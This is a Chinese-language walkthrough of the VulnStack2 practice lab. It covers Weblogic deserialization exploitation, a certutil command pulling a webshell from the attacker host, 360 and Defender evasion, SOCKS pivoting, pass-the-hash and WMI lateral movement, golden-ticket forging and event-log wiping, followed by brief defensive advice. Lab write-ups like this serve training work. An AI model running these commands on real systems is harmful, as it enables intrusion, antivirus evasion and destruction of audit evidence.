从Weblogic到域控:手把手复现VulnStack2靶场的内网渗透实战(含360绕过与代理配置)

张开发
2026/4/25 2:54:04 15 分钟阅读

最新文章

推荐文章

相关文章

分享文章

从Weblogic到域控:手把手复现VulnStack2靶场的内网渗透实战(含360绕过与代理配置)
从Weblogic到域控手把手复现VulnStack2靶场的内网渗透实战含360绕过与代理配置在网络安全领域内网渗透测试是检验企业防御体系的重要环节。VulnStack2靶场作为红队实战训练的经典环境模拟了从外网突破到内网横向移动的完整攻击链。本文将带您一步步复现从Weblogic漏洞利用到最终攻陷域控的全过程特别针对360安全卫士的绕过技巧和内网代理配置进行详细拆解。1. 环境准备与初始信息收集搭建VulnStack2靶场需要以下基础组件VMware Workstation或VirtualBox虚拟机平台Windows Server 2012作为域控制器10.10.10.10Windows 2008 R2运行Weblogic服务192.168.111.80Windows 7作为内网主机10.10.10.111Kali Linux作为攻击机192.168.111.128注意所有测试机默认密码为1qazWSX建议在隔离环境中进行实验初始信息收集阶段使用nmap进行端口扫描nmap -sV -T4 192.168.111.80典型扫描结果应包含7001端口Weblogic控制台445端口SMB服务3389端口RDP服务2. Weblogic漏洞利用与初始立足点Weblogic 10.3.6存在反序列化漏洞CVE-2018-2628利用步骤如下使用ysoserial生成payloadjava -jar ysoserial.jar CommonsCollections1 cmd /c certutil -urlcache -split -f http://192.168.111.128/shell.jsp C:\\shell.jsp payload.bin通过Python脚本发送恶意请求import socket import struct import time def exploit(ip, port, payload): sock socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.connect((ip, port)) handshake t3 12.2.1\nAS:255\nHL:19\nMS:10000000\n\n sock.send(handshake.encode()) # ...省略完整exploit代码... sock.send(payload) time.sleep(5) print(sock.recv(1024)) sock.close()成功上传webshell后使用冰蝎连接时需要特别注意360的文件监控。建议使用内存马而非文件写入对shellcode进行分段传输采用AES加密通信3. 权限维持与360安全卫士绕过在存在360安全卫士的环境中常规操作会被拦截。实测有效的绕过方法包括方法对比表技术手段成功率隐蔽性实现复杂度进程注入高中中白名单劫持中高高服务安装低中低计划任务中低低推荐使用Cobalt Strike的artifact kit生成免杀payload./agscript.sh 192.168.111.128 50050 user pass generate.vbs x64关键步骤获取当前用户权限whoami /priv检查360进程tasklist | findstr 360通过注册表禁用实时防护reg add HKLM\SOFTWARE\Policies\Microsoft\Windows Defender /v DisableAntiSpyware /t REG_DWORD /d 1 /f4. 内网横向移动与代理配置获取内网拓扑后需要建立稳定的通信渠道Socks代理配置流程在已控主机上执行earthworm -s rssocks -l 1080 -e 1234在攻击机上连接proxychains nmap -sT -Pn 10.10.10.0/24常见横向移动技术对比SMB攻击crackmapexec smb 10.10.10.0/24 -u administrator -H NTLM哈希 --exec-method smbexecWMI执行import wmi c wmi.WMI(computer10.10.10.111, useradministrator, password1qazWSX) process c.Win32_Process.Create(CommandLinecmd.exe /c whoami)RDP劫持query user tscon ID /dest:SESSIONNAME5. 域控攻陷与后渗透定位域控制器后可采用多种攻击路径黄金票据生成步骤获取krbtgt的NTLM哈希secretsdump.py domain/admin10.10.10.10 -hashes :hash生成票据ticketer.py -nthash krbtgt_hash -domain-sid SID -domain vulnstack.com administrator注入票据export KRB5CCNAMEadministrator.ccache psexec.py -k -no-pass dc.vulnstack.com在实战中遇到过域策略限制导致票据失效的情况此时可以检查域控时间同步验证票据有效期默认10小时尝试白银票据针对特定服务6. 痕迹清理与防御建议完成渗透后需要清理的日志位置Windows事件日志wevtutil cl Security wevtutil cl SystemWeblogic访问日志del C:\Oracle\Middleware\user_projects\domains\base_domain\servers\AdminServer\logs\access.log防御方建议部署以下检测机制网络层监控异常SMB/WMI连接分析域控的Kerberos请求频率主机层启用Windows Defender攻击面减少规则配置Sysmon监控进程创建事件应用层Weblogic定期升级补丁限制管理接口访问IP

更多文章